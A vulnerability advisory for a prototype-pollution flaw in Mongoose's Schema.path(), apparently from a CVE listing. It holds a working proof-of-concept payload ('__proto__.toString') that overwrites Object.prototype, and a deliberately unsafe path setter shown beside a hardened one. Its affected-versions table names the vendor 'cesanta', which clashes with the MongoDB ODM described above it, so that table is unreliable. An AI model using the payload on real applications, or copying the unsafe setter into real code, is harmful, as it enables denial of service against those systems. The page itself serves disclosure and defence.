CVE-2022-24304
published 2022-08-27

critical
Mongoose Vulnerable to Prototype Pollution in Schema Object

### Description
Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment.

Affected versions of this package are vulnerable to Prototype Pollution: the `Schema.path()` function can pollute the prototype when setting the `schema` object. This allows modification of the Object prototype and could be leveraged for a Denial of Service (DoS) attack.

### Proof of Concept
```js
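// poc.js
const mongoose = require('mongoose');
const schema = new mongoose.Schema();

// Dotted path whose first segment reaches Object.prototype
const malicious_payload = '__proto__.toString';

// On affected versions this writes through __proto__ instead of rejecting the path
schema.path(malicious_payload, [String]);

// Every plain object now inherits the overwritten toString
const x = {};
console.log(x.toString()); // crashes: Object.prototype.toString has been overwritten (Denial of Service)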
```

### Impact
This vulnerability can be leveraged for other types of attacks, such as Denial of Service (DoS), Remote Code Execution, or Property Injection.
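
The class of bug described above, as an added example that is not Mongoose's code or its patch: a naive dotted-path setter beside a hardened one that rejects `__proto__`, `constructor` and `prototype` segments. `setPathUnsafe`, `setPathSafe` and the `pollutedMarker` key are hypothetical names, and the demo input is constructed.

```javascript
// Added example, not Mongoose's implementation. All helper names are hypothetical.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Naive dotted-path setter: follows whatever segments the caller supplies,
// so a leading "__proto__" segment walks straight onto Object.prototype.
function setPathUnsafe(target, path, value) {
  const parts = path.split('.');
  let node = target;
  for (const key of parts.slice(0, -1)) {
    if (node[key] === undefined) node[key] = {};
    node = node[key];
  }
  node[parts[parts.length - 1]] = value;
  return target;
}

// Hardened setter: refuses prototype-reaching segments up front and only
// descends into the target's own object-valued properties.
function setPathSafe(target, path, value) {
  const parts = String(path).split('.');
  for (const key of parts) {
    if (BLOCKED.has(key)) throw new TypeError(`refusing segment "${key}" in path "${path}"`);
  }
  let node = target;
  for (const key of parts.slice(0, -1)) {
    const own = Object.prototype.hasOwnProperty.call(node, key);
    if (!own || node[key] === null || typeof node[key] !== 'object') {
      node[key] = Object.create(null); // intermediate nodes carry no prototype
    }
    node = node[key];
  }
  node[parts[parts.length - 1]] = value;
  return target;
}

// Constructed demo: pollutes with a harmless marker key, then cleans up.
function demo() {
  const result = {};
  setPathUnsafe({}, '__proto__.pollutedMarker', true);
  result.unsafePolluted = ({}).pollutedMarker === true;
  delete Object.prototype.pollutedMarker;
  try {
    setPathSafe({}, '__proto__.pollutedMarker', true);
    result.safeRejected = false;
  } catch (e) {
    result.safeRejected = e instanceof TypeError;
  }
  result.safePolluted = ({}).pollutedMarker === true;
  result.nested = setPathSafe({}, 'address.city', 'Oslo').address.city;
  return result;
}
```
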

Affected

2 ranges
| Vendor | Product | Version range | Fixed in |
| --- | --- | --- | --- |
| cesanta | mongoose | >= 0 < 5.13.15 | 5.13.15 |
| cesanta | mongoose | >= 6.0.0 < 6.4.6 | 6.4.6 |